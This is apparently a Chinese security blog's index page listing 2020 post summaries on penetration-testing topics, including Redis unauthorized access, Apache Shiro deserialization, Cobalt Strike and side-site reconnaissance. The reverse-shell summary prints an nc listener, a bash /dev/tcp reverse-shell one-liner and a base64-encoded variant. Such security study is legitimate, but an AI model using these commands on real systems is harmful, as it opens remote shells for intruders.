2020年6月1日
信息收集之——旁站、C段
摘要: 旁站的概念 ​旁站指的是同一服务器上的其他网站,很多时候,有些网站可能不是那么容易入侵。那么,可以查看该网站所在的服务器上是否还有其他网站。如果有其他网站的话,可以先拿下其他网站的webshell,然后再提权拿到服务器的权限,最后就自然可以拿下该网站了! C段 C段指的是同一内网段内的其他服务器,每 阅读全文
posted @ 2020-06-01 17:38 renblog 阅读(7768) 评论(0) 推荐(1) 编辑
Redis未授权访问漏洞复现与利用
摘要: 漏洞简介 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Red 阅读全文
posted @ 2020-06-01 13:05 renblog 阅读(973) 评论(0) 推荐(0) 编辑
2020年5月28日
NAT基本原理及应用
摘要: 参考链接 https://blog.csdn.net/u013597671/article/details/74275852 阅读全文
posted @ 2020-05-28 17:15 renblog 阅读(268) 评论(0) 推荐(0) 编辑
2020年5月27日
端口转发和端口映射的区别
摘要: 不懂端口的小伙伴可以参考这篇文章——>轻松理解网络端口是什么 端口转发和端口映射都是为了解决内网主机的端口无法在外部直接访问而衍生出来的技术,通过中间服务器进行中转,将内部的端口映射到公网IP上或者将内部端口转发到外部服务器,供用户或者自己来使用,那么他们的区别是什么呢? 端口转发定义 顾名思义,就 阅读全文
posted @ 2020-05-27 22:14 renblog 阅读(13154) 评论(3) 推荐(2) 编辑
Xshell不能连接Kali系统SSH的解决
摘要: 修改sshd_config文件 vim /etc/ssh/sshd_config 将#PasswordAuthentication yes的注释去掉 将#PermitRootLogin prohibit-password的注释去掉 ,prohibit-password 改为yes # Authent 阅读全文
posted @ 2020-05-27 19:22 renblog 阅读(440) 评论(0) 推荐(0) 编辑
PowerSploit
摘要: https://www.cnblogs.com/yuzly/p/10505365.html 阅读全文
posted @ 2020-05-27 14:30 renblog 阅读(124) 评论(0) 推荐(0) 编辑
powertool
摘要: powertool简介 PowerTool 一款免费强大的进程管理器,支持进程强制结束,可以Unlock占用文件的进程,查看文件/文件夹被占用的情况,内核模块和驱动的查看和管理,进程模块的内存的dump等功能。最新版还支持上传文件在线扫描病毒。支持离线的启动项和服务的检测和删除,新增注册表和服务的强 阅读全文
posted @ 2020-05-27 14:29 renblog 阅读(362) 评论(0) 推荐(0) 编辑
Windows/Linux 下反弹shell
摘要: Linux 反弹shell bash环境获取shell 客户端 nc -lvp 8888 服务器 bash -i >& /dev/tcp/ip/port 0>&1 bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0I 阅读全文
posted @ 2020-05-27 11:24 renblog 阅读(1991) 评论(0) 推荐(0) 编辑
Apache Shiro 反序列化漏洞复现(CVE-2016-4437)
摘要: 漏洞描述 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。 漏洞原理 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能 阅读全文
posted @ 2020-05-27 10:48 renblog 阅读(11643) 评论(10) 推荐(1) 编辑
渗透测试神器Cobalt Strike使用教程
摘要: Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Wi 阅读全文
posted @ 2020-05-27 09:20 renblog 阅读(3634) 评论(0) 推荐(0) 编辑